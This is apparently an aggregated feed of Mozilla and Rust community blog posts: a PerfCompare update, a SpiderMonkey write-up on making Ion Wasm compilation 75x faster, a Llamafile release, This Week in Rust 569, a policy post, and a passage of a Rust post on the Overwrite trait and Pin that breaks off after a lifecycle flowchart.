We are in the process of updating the Firefox source docs, but documentation for PerfCompare can be found at PerfCompare Documentation. It provides details on all the new features currently available on PerfCompare and instructions on how to use the tool.

Some key highlights regarding features include:

  • Allowing comparisons of up to three new revisions/patches versus the base revision of a repository (mozilla-central, autoland, etc.)

Search results with selected base and new revisions selected

  • Searching revisions by short hash, long hash, or author email
  • A more visible and separate workflow for comparing revisions over time

Compare over time with one revision selected

  • Editing the compared revisions on the results page to compute new comparisons for an updated results table without having to return to the home page
  • Expanded rows in the results table with graphs for the base and new revisions

Expanded row in results table with graph


And there’s much more in the works!

I’d like to extend a huge congratulations to the performance test team, Dasha, and everyone who has contributed feedback and suggestions to our user research, team meetings, and presentations. We owe PerfCompare’s launch and continued improvement to you!

If you have any questions or comments about PerfCompare, you can find us in the #PerfCompare matrix channel or join our #PerfCompareUserResearch channel. If you experience any issues, please report them on Bugzilla.

Spidermonkey Development Blog75x faster: optimizing the Ion compiler backend

In September, machine learning engineers at Mozilla filed a bug report indicating that Firefox was consuming excessive memory and CPU resources while running Microsoft’s ONNX Runtime (a machine learning library) compiled to WebAssembly.

This post describes how we addressed this and some of our longer-term plans for improving WebAssembly performance in the future.

The problem

SpiderMonkey has two compilers for WebAssembly code. First, a Wasm module is compiled with the Wasm Baseline compiler, a compiler that generates decent machine code very quickly. This is good for startup time because we can start executing Wasm code almost immediately after downloading it. Andy Wingo wrote a nice blog post about this Baseline compiler.

When Baseline compilation is finished, we compile the Wasm module with our more advanced Ion compiler. This backend produces faster machine code, but compilation time is a lot higher.

The issue with the ONNX module was that the Ion compiler backend took a long time and used a lot of memory to compile it. On my Linux x64 machine, Ion-compiling this module took about 5 minutes and used more than 4 GB of memory. Even though this work happens on background threads, this was still too much overhead.

Optimizing the Ion backend

When we investigated this, we noticed that this Wasm module had some extremely large functions. For the largest one, Ion’s MIR control flow graph contained 132856 basic blocks. This uncovered some performance cliffs in our compiler backend.

VirtualRegister live ranges

In Ion’s register allocator, each VirtualRegister has a list of LiveRange objects. We were using a linked list for this, sorted by start position. This caused quadratic behavior when allocating registers: the allocator often splits live ranges into smaller ranges and we’d have to iterate over the list for each new range to insert it at the correct position to keep the list sorted. This was very slow for virtual registers with thousands of live ranges.

To address this, I tried a few different data structures. The first attempt was to use an AVL tree instead of a linked list and that was a big improvement, but the performance was still not ideal and we were also worried about memory usage increasing even more.

After this we realized we could store live ranges in a vector (instead of a linked list) that’s optionally sorted by decreasing start position. We also made some changes to ensure the initial live ranges are sorted when we create them, so that we could just append ranges to the end of the vector.

The observation here was that the core of the register allocator, where it assigns registers or stack slots to live ranges, doesn’t actually require the live ranges to be sorted. We therefore now just append new ranges to the end of the vector and mark the vector unsorted. Right before the final phase of the allocator, where we again rely on the live ranges being sorted, we do a single std::sort operation on the vector for each virtual register with unsorted live ranges. Debug assertions are used to ensure that functions that require the vector to be sorted are not called when it’s marked unsorted.
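
As a rough sketch of this pattern (in Rust for illustration; the actual SpiderMonkey code is C++ and the names here are invented):

// Illustrative only: append new live ranges unsorted, and sort lazily
// right before the one phase that needs them ordered.
struct LiveRange {
    start: u32,
    end: u32,
}

struct VirtualRegister {
    ranges: Vec<LiveRange>,
    sorted: bool,
}

impl VirtualRegister {
    // Splitting a range just appends; no O(n) insertion to keep order.
    fn add_range(&mut self, range: LiveRange) {
        self.ranges.push(range);
        self.sorted = false;
    }

    // Called once before the final phase that relies on sorted order.
    fn ensure_sorted(&mut self) {
        if !self.sorted {
            // Sorted by decreasing start position, as described above.
            self.ranges.sort_by(|a, b| b.start.cmp(&a.start));
            self.sorted = true;
        }
    }
}

fn main() {
    let mut vreg = VirtualRegister { ranges: Vec::new(), sorted: true };
    vreg.add_range(LiveRange { start: 10, end: 20 });
    vreg.add_range(LiveRange { start: 2, end: 8 });
    vreg.ensure_sorted();
    assert_eq!(vreg.ranges[0].start, 10); // highest start comes first
    assert_eq!(vreg.ranges[0].end, 20);
}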

Vectors are also better for cache locality and they let us use binary search in a few places. When I was discussing this with Julian Seward, he pointed out that Chris Fallin also moved away from linked lists to vectors in Cranelift’s port of Ion’s register allocator. It’s always good to see convergent evolution :)

This change from sorted linked lists to optionally-sorted vectors made Ion compilation of this Wasm module about 20 times faster, down to 14 seconds.

Semi-NCA

The next problem that stood out in performance profiles was the Dominator Tree Building compiler pass, in particular a function called ComputeImmediateDominators. This function determines the immediate dominator block for each basic block in the MIR graph.

The algorithm we used for this (based on A Simple, Fast Dominance Algorithm by Cooper et al) is relatively simple but didn’t scale well to very large graphs.

Semi-NCA (from Linear-Time Algorithms for Dominators and Related Problems by Loukas Georgiadis) is a different algorithm that’s also used by LLVM and the Julia compiler. I prototyped this and was surprised to see how much faster it was: it got our total compilation time down from 14 seconds to less than 8 seconds. For a single-threaded compilation, it reduced the time under ComputeImmediateDominators from 7.1 seconds to 0.15 seconds.

Fortunately it was easy to run both algorithms in debug builds and assert they computed the same immediate dominator for each basic block. After a week of fuzz-testing, no problems were found and we landed a patch that removed the old implementation and enabled the Semi-NCA code.

Sparse BitSets

For each basic block, the register allocator allocated a (dense) bit set with a bit for each virtual register. These bit sets are used to check which virtual registers are live at the start of a block.

For the largest function in the ONNX Wasm module, this used a lot of memory: 199477 virtual registers x 132856 basic blocks is at least 3.1 GB just for these bit sets! Because most virtual registers have short live ranges, these bit sets had relatively few bits set to 1.

We replaced these dense bit sets with a new SparseBitSet data structure that uses a hashmap to store 32 bits per entry. Because most of these hashmaps contain a small number of entries, it uses an InlineMap to optimize for this: it’s a data structure that stores entries either in a small inline array or (when the array is full) in a hashmap. We also optimized InlineMap to use a variant (a union type) for these two representations to save memory.
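
A simplified Rust sketch of the idea (illustrative only; the real SparseBitSet is C++ and, as described above, additionally stores small maps inline via InlineMap):

use std::collections::HashMap;

// Bits are grouped into 32-bit words; only words containing at least one
// set bit are stored, so mostly-empty sets stay small.
#[derive(Default)]
struct SparseBitSet {
    words: HashMap<u32, u32>, // word index -> 32 bits
}

impl SparseBitSet {
    fn insert(&mut self, bit: u32) {
        *self.words.entry(bit / 32).or_insert(0) |= 1 << (bit % 32);
    }

    fn contains(&self, bit: u32) -> bool {
        self.words
            .get(&(bit / 32))
            .map_or(false, |word| word & (1 << (bit % 32)) != 0)
    }
}

fn main() {
    let mut live = SparseBitSet::default();
    live.insert(7);
    live.insert(199_476);
    assert!(live.contains(7) && live.contains(199_476));
    assert!(!live.contains(8));
}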

This saved at least 3 GB of memory but also improved the compilation time for the Wasm module to 5.4 seconds.

Faster move resolution

The last issue that showed up in profiles was a function in the register allocator called createMoveGroupsFromLiveRangeTransitions. After the register allocator assigns a register or stack slot to each live range, this function is responsible for connecting pairs of live ranges by inserting moves.

For example, if a value is stored in a register but is later spilled to memory, there will be two live ranges for its virtual register. This function then inserts a move instruction to copy the value from the register to the stack slot at the start of the second live range.

This function was slow because it had a number of loops with quadratic behavior: for a move’s destination range, it would do a linear lookup to find the best source range. We optimized the main two loops to run in linear time instead of being quadratic, by taking more advantage of the fact that live ranges are sorted.
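
The general shape of that fix is to replace a rescan-from-the-start lookup with a single forward-moving cursor over the sorted data. A generic Rust illustration of the technique (not the actual allocator code):

// Illustrative only: for each query position (sorted ascending), find the
// index of the range start (also sorted ascending) that covers it, advancing
// one cursor instead of rescanning the whole list for every query.
fn find_covering(range_starts: &[u32], queries: &[u32]) -> Vec<Option<usize>> {
    let mut cursor = 0;
    let mut out = Vec::with_capacity(queries.len());
    for &q in queries {
        while cursor + 1 < range_starts.len() && range_starts[cursor + 1] <= q {
            cursor += 1;
        }
        out.push(match range_starts.get(cursor) {
            Some(&start) if start <= q => Some(cursor),
            _ => None,
        });
    }
    out
}

fn main() {
    let starts = [0, 10, 25];
    let queries = [3, 12, 30];
    assert_eq!(find_covering(&starts, &queries), vec![Some(0), Some(1), Some(2)]);
}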

With these changes, Ion can compile the ONNX Wasm module in less than 3.9 seconds on my machine, more than 75x faster than before these changes.

Adobe Photoshop

These changes not only improved performance for the ONNX Runtime module, but also for a number of other WebAssembly modules. A large Wasm module downloaded from the free online Adobe Photoshop demo can now be Ion-compiled in 14 seconds instead of 4 minutes.

The JetStream 2 benchmark has a HashSet module that was affected by the quadratic move resolution code. Ion compilation time for it improved from 2.8 seconds to 0.2 seconds.

New Wasm compilation pipeline

Even though these are great improvements, spending at least 14 seconds (on a fast machine!) to fully compile Adobe Photoshop on background threads still isn’t an amazing user experience. We expect this to only get worse as more large applications are compiled to WebAssembly.

To address this, our WebAssembly team is making great progress rearchitecting the Wasm compiler pipeline. This work will make it possible to Ion-compile individual Wasm functions as they warm up instead of compiling everything immediately. It will also unlock exciting new capabilities such as (speculative) inlining.

Stay tuned for updates on this as we start rolling out these changes in Firefox.

- Jan de Mooij, engineer on the SpiderMonkey team

Hacks.Mozilla.OrgLlamafile v0.8.14: a new UI, performance gains, and more

We’ve just released Llamafile 0.8.14, the latest version of our popular open source AI tool. A Mozilla Builders project, Llamafile turns model weights into fast, convenient executables that run on most computers, making it easy for anyone to get the most out of open LLMs using the hardware they already have.

New chat interface

The key feature of this new release is our colorful new command line chat interface. When you launch a Llamafile we now automatically open this new chat UI for you, right there in the terminal. This new interface is fast, easy to use, and an all-around simpler experience than the Web-based interface we previously launched by default. (That interface, which our project inherits from the upstream llama.cpp project, is still available and supports a range of features, including image uploads. Simply point your browser at port 8080 on localhost.)

llamafile

Other recent improvements

This new chat UI is just the tip of the iceberg. In the months since our last blog post here, lead developer Justine Tunney has been busy shipping a slew of new releases, each of which has moved the project forward in important ways. Here are just a few of the highlights:

Llamafiler: We’re building our own clean sheet OpenAI-compatible API server, called Llamafiler. This new server will be more reliable, stable, and most of all faster than the one it replaces. We’ve already shipped the embeddings endpoint, which runs three times as fast as the one in llama.cpp. Justine is currently working on the completions endpoint, at which point Llamafiler will become the default API server for Llamafile.

Performance improvements: With the help of open source contributors like k-quant inventor @Kawrakow, Llamafile has enjoyed a series of dramatic speed boosts over the last few months. In particular, pre-fill (prompt evaluation) speed has improved dramatically on a variety of architectures:

  • Intel Core i9 went from 100 tokens/second to 400 (4x).
  • AMD Threadripper went from 300 tokens/second to 2,400 (8x).
  • Even the modest Raspberry Pi 5 jumped from 8 tokens/second to 80 (10x!).

When combined with the new high-speed embedding server described above, Llamafile has become one of the fastest ways to run complex local AI applications that use methods like retrieval augmented generation (RAG).

Support for powerful new models: Llamafile continues to keep pace with progress in open LLMs, adding support for dozens of new models and architectures, ranging in size from 405 billion parameters all the way down to 1 billion. Here are just a few of the new Llamafiles available for download on Hugging Face:

  • Llama 3.2 1B and 3B: offering extremely impressive performance and quality for their small size. (Here’s a video from our own Mike Heavers showing it in action.)
  • Llama 3.1 405B: a true “frontier model” that’s possible to run at home with sufficient system RAM.
  • OLMo 7B: from our friends at the Allen Institute, OLMo is one of the first truly open and transparent models available.
  • TriLM: a new “1.58 bit” tiny model that is optimized for CPU inference and points to a near future where matrix multiplication might no longer rule the day.

Whisperfile, speech-to-text in a single file: Thanks to contributions from community member @cjpais, we’ve created Whisperfile, which does for whisper.cpp what Llamafile did for llama.cpp: that is, turns it into a multi-platform executable that runs nearly everywhere. Whisperfile thus makes it easy to use OpenAI’s Whisper technology to efficiently convert speech into text, no matter which kind of hardware you have.

Get involved

Our goal is for Llamafile to become a rock-solid foundation for building sophisticated locally-running AI applications. Justine’s work on the new Llamafiler server is a big part of that equation, but so is the ongoing work of supporting new models and optimizing inference performance for as many users as possible. We’re proud and grateful that some of the project’s biggest breakthroughs in these areas, and others, have come from the community, with contributors like @Kawrakow, @cjpais, @mofosyne, and @Djip007 routinely leaving their mark.

We invite you to join them, and us. We welcome issues and PRs in our GitHub repo. And we welcome you to become a member of Mozilla’s AI Discord server, which has a dedicated channel just for Llamafile where you can get direct access to the project team. Hope to see you there!

 

The post Llamafile v0.8.14: a new UI, performance gains, and more appeared first on Mozilla Hacks - the Web developer blog.

This Week In RustThis Week in Rust 569

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Foundation
Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs

Crate of the Week

This week's crate is bacon, a terminal application that runs your cargo tasks in the background whenever your code changes.

Thanks to Denys Séguret for the self-suggestion! Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
  • No calls for testing were issued this week.
Rust
  • No calls for testing were issued this week.
Rustup
  • No calls for testing were issued this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

No Calls for participation were submitted this week.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

No Calls for papers or presentations were submitted this week.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

468 pull requests were merged in the last week

Rust Compiler Performance Triage

No major changes this week.

Triage done by @simulacrum. Revision range: e6c46db4..5ceb623a

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

  • No RFCs were approved this week.
Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
  • No RFCs entered Final Comment Period this week.
Tracking Issues & PRs
Rust Cargo Language Team
  • No Cargo Tracking Issues or PRs entered Final Comment Period this week.
Language Reference
  • No Language Reference RFCs entered Final Comment Period this week.
Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs

Upcoming Events

Rusty Events between 2024-10-16 - 2024-11-13 🦀

Virtual
Africa
Asia
Europe
North America
Oceania

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

We'd have buttons on the screen to control the fans of the car. I had to write a lot of code before I could compile it all, a big jenga tower. But once it compiled, the fans started to work! Very impressed.

Julius Gustavsson on the Tweedegolf blog

Thanks to scottmcm for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, andrewpollack, U007D, kolharsam, joelmarcey, mariannegoldin, bennyvasquez.

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

Don MartiAnother easy-ish state law: the No Second-class Citizenship Act

Tired of Big Tech companies giving consumer protections, fraud protections, and privacy protections to their users in other countries but not to people at home in the USA? Here’s another state law we could use, and I bet it could be a two-page PDF.

If a company has more than 10% of our state’s residents as customers or users, and also does business in 50 or more countries, then if they offer a privacy or consumer protection feature in a non-US location they must also offer it in our state within 90 days.

Have it enforced Texas SB 8 style, by individuals, so it's harder for Big Tech sockpuppet orgs to challenge.

Reference

Antitrust challenge to Facebook’s ‘superprofiling’ finally wraps in Germany — with Meta agreeing to data limits | TechCrunch We’ve asked Meta to confirm whether changes will be implemented globally — or only inside the German market where the Bundeskartellamt has jurisdiction.

Related

there ought to be a law (Big Tech lobbyists are expensive—instead of grinding out the PDFs they expect, make them fight an unpredictable distributed campaign of random-ish ideas, coded into bills that take the side of local small businesses?)

Bonus links

How the long-gone Habsburg Empire is still visible in Eastern European bureaucracies today The formal institutions of the empire ceased to exist with the collapse of the Habsburg Empire after World War I, breaking up into separate nation states that have seen several waves of drastic institutional changes since. We might therefore wonder whether differences in trust and corruption across areas that belonged to different empires in the past really still survive to this day.

TikTok knows its app is harming kids, new internal documents show : NPR (this kind of stuff is why I’ll never love your brand—if a brand is fine with advertising on surveillance apps with all we know about how they work, then I’m enough opposed to them on fundamental issues that all transactions will be based on lack of trust.)

Cloudflare Destroys Another Patent Troll, Gets Its Patents Released To The Public (time for some game theory)

Conceptual models of space colonization (One that’s missing: Kurt Vonnegut’s concept involving large-scale outward transfer of genetic material. Probably most likely to happen if you add in Von Neumann machines and the systems required to grow live colonists from genetic data—which don’t exist but are not physically or economically impossible…)

Cash incinerator OpenAI secures its $6.6 billion lifeline — ‘in the spirit of a donation’ (fwiw, there are still a bunch of copyright cases out there, too. (AI legal links) Related: The Subprime AI Crisis)

The cheap chocolate system The giant chocolate companies want cocoa beans to be a commodity. They don’t want to worry about origin or yield–they simply want to buy indistinguishable cheap cacao. In fact, the buyers at these companies feel like they have no choice but to push for mediocre beans at cut rate prices, regardless of the human cost. (so it’s like adtech you eat?)

How web bloat impacts users with slow devices CPU performance for web apps hasn’t scaled nearly as quickly as bandwidth so, while more of the web is becoming accessible to people with low-end connections, more of the web is becoming inaccessible to people with low-end devices even if they have high-end connections.

Niko MatsakisThe `Overwrite` trait and `Pin`

In July, boats presented a compelling vision in their post pinned places. With the Overwrite trait that I introduced in my previous post, however, I think we can get somewhere even more compelling, albeit at the cost of a tricky transition. As I will argue in this post, the Overwrite trait effectively becomes a better version of the existing Unpin trait, one that effects not only pinned references but also regular &mut references. Through this it’s able to make Pin fit much more seamlessly with the rest of Rust.

Just show me the dang code

Before I dive into the details, let’s start by reviewing a few examples to show you what we are aiming at (you can also skip to the TL;DR, in the FAQ).

I’m assuming a few changes here:

  • Adding an Overwrite trait and changing most types to be !Overwrite by default.
    • The Option<T> (and maybe others) would opt-in to Overwrite, permitting x.take().
  • Integrating pin into the borrow checker, extending auto-ref to also “auto-pin” and produce a Pin<&mut T>. The borrow checker only permits you to pin values that you own. Once a place has been pinned, you are not permitted to move out from it anymore (unless the value is overwritten).

The first change is “mildly” backwards incompatible. I’m not going to worry about that in this post, but I’ll cover the ways I think we can make the transition in a follow up post.

Example 1: Converting a generator into an iterator

We would really like to add a generator syntax that lets you write an iterator more conveniently.1 For example, given some slice strings: &[String], we should be able to define a generator that iterates over the string lengths like so:

fn do_computation() -> usize {
    let hashes = gen {
        let strings: Vec<String> = compute_input_strings();
        for string in &strings {
            yield compute_hash(&string);
        }
    };
    
    // ...
}

But there is a catch here! To permit the borrow of strings, which is owned by the generator, the generator will have to be pinned.2 That means that generators cannot directly implement Iterator, because generators need a Pin<&mut Self> signature for their next methods. It is possible, however, to implement Iterator for Pin<&mut G> where G is a generator.3

In today’s Rust, that means that using a generator as an iterator would require explicit pinning:

fn do_computation() -> usize {
    let hashes = gen {....};
    let hashes = pin!(hashes); // <-- explicit pin
    if let Some(h) = hashes.next() {
        // process first hash
    };
    // ...
}

With pinned places, this feels more builtin, but it still requires users to actively think about pinning for even the most basic use case:

fn do_computation() -> usize {
    let hashes = gen {....};
    let pinned mut hashes = hashes;
    if let Some(h) = hashes.next() {
        // process first hash
    };
    // ...
}

Under this proposal, users would simply be able to ignore pinning altogether:

fn do_computation() -> usize {
    let mut hashes = gen {....};
    if let Some(h) = hashes.next() {
        // process first hash
    };
    // ...
}

Pinning is still happening: once a user has called next, they would not be able to move hashes after that point. If they tried to do so, the borrow checker (which now understands pinning natively) would give an error like:

error[E0596]: cannot borrow `hashes` as mutable, as it is not declared as mutable
 --> src/lib.rs:4:22
  |
4 |     if let Some(h) = hashes.next() {
  |                      ------ value in `hashes` was pinned here
  |     ...
7 |     move_somewhere_else(hashes);
  |                         ^^^^^^ cannot move a pinned value
help: if you want to move `hashes`, consider using `Box::pin` to allocate a pinned box
  |
3 |     let mut hashes = Box::pin(gen { .... });
  |                      +++++++++            +

As noted, it is possible to move hashes after pinning, but only if you pin it into a heap-allocated box. So we can advise users how to do that.

Example 2: Implementing the MaybeDone future

The pinned places post included an example future called MaybeDone. I’m going to implement that same future in the system I describe here. There are some comments in the example comparing it to the version from the pinned places post.

enum MaybeDone<F: Future> {
    //         ---------
    //         I'm assuming we are in Rust.Next, and so the default
    //         bounds for `F` do not include `Overwrite`.
    //         In other words, `F: ?Overwrite` is the default
    //         (just as it is with every other trait besides `Sized`).
    
    Polling(F),
    //      -
    //      We don't need to declare `pinned F`.
    
    Done(Option<F::Output>),
}

impl<F: Future> MaybeDone<F> {
    fn maybe_poll(self: Pin<&mut Self>, cx: &mut Context<'_>) {
        //        --------------------
        //        I'm not bothering with the `&pinned mut self`
        //        sugar here, though certainly we could still
        //        add it.
        if let MaybeDone::Polling(fut) = self {
            //                    ---
            //       Just as in the original example,
            //       we are able to project from `Pin<&mut Self>`
            //       to a `Pin<&mut F>`.
            //
            //       The key is that we can safely project
            //       from an owner of type `Pin<&mut Self>`
            //       to its field of type `Pin<&mut F>`
            //       so long as the owner type `Self: !Overwrite`
            //       (which is the default for structs in Rust.Next).
            if let Poll::Ready(res) = fut.poll(cx) {
                *self = MaybeDone::Done(Some(res));
            }
        }
    }

    fn is_done(&self) -> bool {
        matches!(self, &MaybeDone::Done(_))
    }

    fn take_output(&mut self) -> Option<F::Output> {
        //         ---------
        //   In pinned places, this method had to be
        //   `&pinned mut self`, but under this design,
        //   it can be a regular `&mut self`.
        //   
        //   That's because `Pin<&mut Self>` becomes
        //   a subtype of `&mut Self`.
        if let MaybeDone::Done(res) = self {
            res.take()
        } else {
            None
        }
    }
}
Example 3: Implementing the Join combinator

Let’s complete the journey by implementing a Join future:

struct Join<F1: Future, F2: Future> {
    // These fields do not have to be declared `pinned`:
    fut1: MaybeDone<F1>,
    fut2: MaybeDone<F2>,
}

impl<F1, F2> Future for Join<F1, F2>
where
    F1: Future,
    F2: Future,
{
    type Output = (F1::Output, F2::Output);

    fn poll(self: Pin<&mut Self>, cx: &mut Context<'_>) -> Poll<Self::Output> {
        //  --------------------
        // Again, I've dropped the sugar here.
        
        // This looks just the same as in the
        // "Pinned Places" example. This again
        // leans on the ability to project
        // from a `Pin<&mut Self>` owner so long as
        // `Self: !Overwrite` (the default for structs
        // in Rust.Next).
        self.fut1.maybe_poll(cx);
        self.fut2.maybe_poll(cx);
        
        if self.fut1.is_done() && self.fut2.is_done() {
            // This code looks the same as it did with pinned places,
            // but there is an important difference. `take_output`
            // is now an `&mut self` method, not a `Pin<&mut Self>`
            // method. This demonstrates that we can also get
            // a regular `&mut` reference to our fields.
            let res1 = self.fut1.take_output().unwrap();
            let res2 = self.fut2.take_output().unwrap();
            Poll::Ready((res1, res2))
        } else {
            Poll::Pending
        }
    }
}

How I think about pin

OK, now that I’ve lured you in with code examples, let me drive you away by diving into the details of Pin. I’m going to cover the way that I think about Pin. It is similar to but different from how Pin is presented in the pinned places post – in particular, I prefer to think about places that pin their values and not pinned places. In any case, Pin is surprisingly subtle, and I recommend that if you want to go deeper, you read boat’s history of Pin post and/or the stdlib documentation for Pin.

The Pin<P> type is a modifier on the pointer P

The Pin<P> type is unusual in Rust. It looks similar to a “smart pointer” type, like Arc<T>, but it functions differently. Pin<P> is not a pointer, it is a modifier on another pointer, so

  • a Pin<&T> represents a pinned reference,
  • a Pin<&mut T> represents a pinned mutable reference,
  • a Pin<Box<T>> represents a pinned box,

and so forth.

You can think of a Pin<P> type as being a pointer of type P that refers to a place (Rust jargon for a location in memory that stores a value) whose value v has been pinned. A pinned value v can never be moved to another place in memory. Moreover, v must be dropped before its place can be reassigned to another value.
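
To make this concrete, here is a minimal sketch using today's standard library APIs (the types and values are just placeholders): Box::pin creates a pinned heap place, and the std::pin::pin! macro pins a place on the stack.

use std::pin::{pin, Pin};

fn main() {
    // A pinned box: the heap place that stores the value is pinned for
    // as long as the value lives there.
    let mut boxed: Pin<Box<u32>> = Box::pin(5);
    let _pinned_ref: Pin<&mut u32> = boxed.as_mut();

    // A pinned stack place, created with the `pin!` macro.
    let pinned_local: Pin<&mut u32> = pin!(7);
    let _ = pinned_local;
}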

Pinning is part of the “lifecycle” of a place

The way I think about it, every place in memory has a lifecycle:

flowchart TD
Uninitialized 
Initialized
Pinned

Uninitialized --
    p = v where v: T
--> Initialized

Initialized -- 
    move out, drop, or forget
--> Uninitialized

Initialized --
    pin value v in p
    (only possible when T is !Unpin)
--> Pinned

Pinned --
    drop value
--> Uninitialized

Pinned --
    move out or forget
--> UB

Uninitialized --
    free the place
--> Freed

UB[💥 Undefined behavior 💥]
  

When first allocated, a place p is uninitialized – that is, p has no value at all.

An uninitialized place can be freed. This corresponds to e.g. popping a stack frame or invoking free.

p may at some point become initialized by an assignment like p = v. At that point, there are three ways to transition back to uninitialized:

  • The value v could be moved somewhere else, e.g. by an assignment like let p2 = p. At that point, p goes back to being uninitialized.
  • The value v can be forgotten, with std::mem::forget(p). At this point, no destructor runs, but p goes back to being considered uninitialized.
  • The value v can be dropped, which occurs when the place p goes out of scope. At this point, the destructor runs, and p goes back to being considered uninitialized.

Alternatively, the value v can be pinned in place:

  • At this point, v cannot be moved again, and the only way for p to be reused is for v to be dropped.

Once a value is pinned, moving or forgetting the value is not allowed. These actions are “undefined behavior”, and safe Rust must not permit them to occur.

A digression on forgetting vs other ways to leak

As most folks know, Rust does not guarantee that destructors run. If you have a value v whose destructor never runs, we say that value is leaked. There are however two ways to leak a value, and they are quite different in their impact:

  • Option A: Forgetting. Using std::mem::forget, you can forget the value v. The place p that was storing that value will go from initialized to uninitialized, at which point the place p can be freed.
    • Forgetting a value is undefined behavior if that value has been pinned, however!
  • Option B: Leak the place. When you leak a place, it just stays in the initialized or pinned state forever, so its value is never dropped. This can happen, for example, with a ref-count cycle.
    • This is safe even if the value is pinned!
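
To make the distinction concrete, here is a minimal sketch of the two kinds of leak (my example, not from the original post): Option A frees the place but skips the destructor; Option B keeps the places alive forever via a ref-count cycle.

use std::cell::RefCell;
use std::rc::Rc;

struct Node {
    next: RefCell<Option<Rc<Node>>>,
}

fn main() {
    // Option A: forgetting. The place that held `v` becomes uninitialized
    // (its stack slot can be reused), but `v`'s destructor never runs.
    let v = String::from("hello");
    std::mem::forget(v);

    // Option B: leaking the place. The two nodes keep each other alive, so
    // their places stay initialized forever and no destructor ever runs.
    let a = Rc::new(Node { next: RefCell::new(None) });
    let b = Rc::new(Node { next: RefCell::new(Some(a.clone())) });
    *a.next.borrow_mut() = Some(b);
}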

In retrospect, I wish that Option A did not exist – I wish that we had not added std::mem::forget. We did so as part of working through the impact of ref-count cycles. It seemed equivalent at the time (“the dtor doesn’t run anyway, why not make it easy to do”) but I think this diagram shows why adding forget made things permanently more complicated for relatively little gain.4 Oh well! Can’t win ’em all.

Values of types implementing Unpin cannot be pinned

There is one subtle aspect here: not all values can be pinned. If a type T implements Unpin, then values of type T cannot be pinned. When you have a pinned reference to them, they can still squirm out from under you via swap or other techniques. Another way to say the same thing is to say that values can only be pinned if their type is !Unpin (“does not implement Unpin”).

Types that are !Unpin can be called address sensitive, meaning that once they are pinned, there can be pointers to the internals of that value that will be invalidated if the address changes. Types that implement Unpin would therefore be address insensitive. Traditionally, all Rust types have been address insensitive, and therefore Unpin is an auto trait, implemented by most types by default.
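
Here is a minimal sketch (using today's APIs) of what “squirming out” looks like: when T: Unpin, Pin::get_mut hands back a plain &mut T, and the supposedly pinned value can simply be swapped away.

use std::pin::Pin;

fn swap_out<T: Unpin>(p: Pin<&mut T>, replacement: &mut T) {
    // `Pin::get_mut` is only available when `T: Unpin`; that is exactly
    // what lets the value escape from behind the pinned reference.
    std::mem::swap(p.get_mut(), replacement);
}

fn main() {
    let mut a = 1_u32;
    let mut b = 2_u32;
    swap_out(Pin::new(&mut a), &mut b);
    assert_eq!((a, b), (2, 1));
}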

Pin<&mut T> is really a “maybe pinned” reference

Looking at the state machine as I describe it here, we can see that a Pin<&mut T> isn’t really a pinned mutable reference, in the sense that it doesn’t always refer to a place that is pinning its value. If T: Unpin, then it’s just a regular reference. But if T: !Unpin, then a pinned reference guarantees that the value it refers to is pinned in place.

This fits with the name Unpin, which I believe was meant to convey the idea that, even if you have a pinned reference to a value of type T: Unpin, that value can become unpinned. I’ve heard the metaphor of “if T: Unpin, you can lift out the pin, swap in a different value, and put the pin back”.

Pin picked a peck of pickled pain

Everyone agrees that Pin is confusing and a pain to use. But what makes it such a pain?

If you are attempting to author a Pin-based API, there are two primary problems:

  1. Pin<&mut Self> methods can’t make use of regular &mut self methods.
  2. Pin<&mut Self> methods can’t access fields by default. Crates like pin-project-lite make this easier but still require learning obscure concepts like structural pinning.

If you are attempting to consume a Pin-based API, the primary annoyance is that getting a pinned reference is hard. You can’t just call Pin<&mut Self> methods normally, you have to remember to use Box::pin or pin! first. (We saw this in Example 1 from this post.)

My proposal in a nutshell

This post is focused on a proposal with two parts:

  1. Making Pin-based APIs easier to author by replacing the Unpin trait with Overwrite.
  2. Making Pin-based APIs easier to call by integrating pinning into the borrow checker.

I’m going to walk through those in turn.

Making Pin-based APIs easier to author

Overwrite as the better Unpin

The first part of my proposal is a change I call s/Unpin/Overwrite/. The idea is to introduce Overwrite and then change the “place lifecycle” to reference Overwrite instead of Unpin:

flowchart TD
Uninitialized 
Initialized
Pinned

Uninitialized --
    p = v where v: T
--> Initialized

Initialized -- 
    move out, drop, or forget
--> Uninitialized

Initialized --
    pin value v in p
    (only possible when T is 👉!Overwrite👈)
--> Pinned

Pinned --
    drop value
--> Uninitialized

Pinned --
    move out or forget
--> UB

Uninitialized --
    free the place
--> Freed

UB[💥 Undefined behavior 💥]

